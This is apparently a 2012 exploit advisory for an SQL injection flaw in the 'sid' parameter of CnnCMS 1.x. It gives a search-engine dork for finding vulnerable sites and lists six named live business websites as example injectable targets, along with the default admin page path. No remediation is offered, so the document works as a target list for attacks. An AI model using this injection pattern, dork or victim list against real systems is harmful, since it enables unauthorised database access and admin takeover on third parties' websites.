========================================================================= CnnCMS 1.x SQL Injection Vulnerability ========================================================================= :-------------------------------------------------------------------------------------------------------------------------:: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability: # Date : March 3rd 2012: # Author : X-Cisadane: # Software Link : http://www.thinknolimits.com/: # Version : 1.x: # Category : Web Applications : # Vulnerability : SQL Injection: # Tested On : Google Chrome 14.0.835 (Windows): # Dorks : inurl:sub_menu.php?sid=: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari:-------------------------------------------------------------------------------------------------------------------------:  SQL Injection Vulnerability: - Open Victim Website : http:////sub_menu.php?sid=-[SQL] Example: http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13  http://lunar.co.id/sub_menu.php?sid=-1 http://www.djawaleather.com/sub_menu.php?sid=-1 http://www.gravigra.com/sub_menu.php?sid=-1 http://www.harpagreen.com/sub_menu.php?sid=-2 http://www.suwastama.co.id/sub_menu.php?sid=-1 Admin Page (Default) : http:////admin/